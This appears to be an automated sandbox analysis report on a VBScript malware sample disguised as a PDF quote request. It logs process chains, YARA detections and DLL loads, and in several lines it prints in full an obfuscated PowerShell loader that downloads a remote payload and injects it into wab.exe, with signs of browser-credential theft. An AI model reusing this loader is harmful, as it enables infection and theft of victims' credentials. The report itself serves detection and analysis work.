&Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_045C0256 Sleep,NtProtectVirtualMemory,9_2_045C0256
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4B5962_2_00007FF848F4B596
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4C3422_2_00007FF848F4C342
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0384F2585_2_0384F258
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0384FB285_2_0384FB28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0384EF105_2_0384EF10
              Source: Request for Proposal Quote_2414976#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi32_2228.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@14/13@2/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\gennemsgnings.FasJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Rundturens.txtJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6784
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2228
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, 00000009.00000003.2527087056.0000000002745000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Request for Proposal Quote_2414976#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
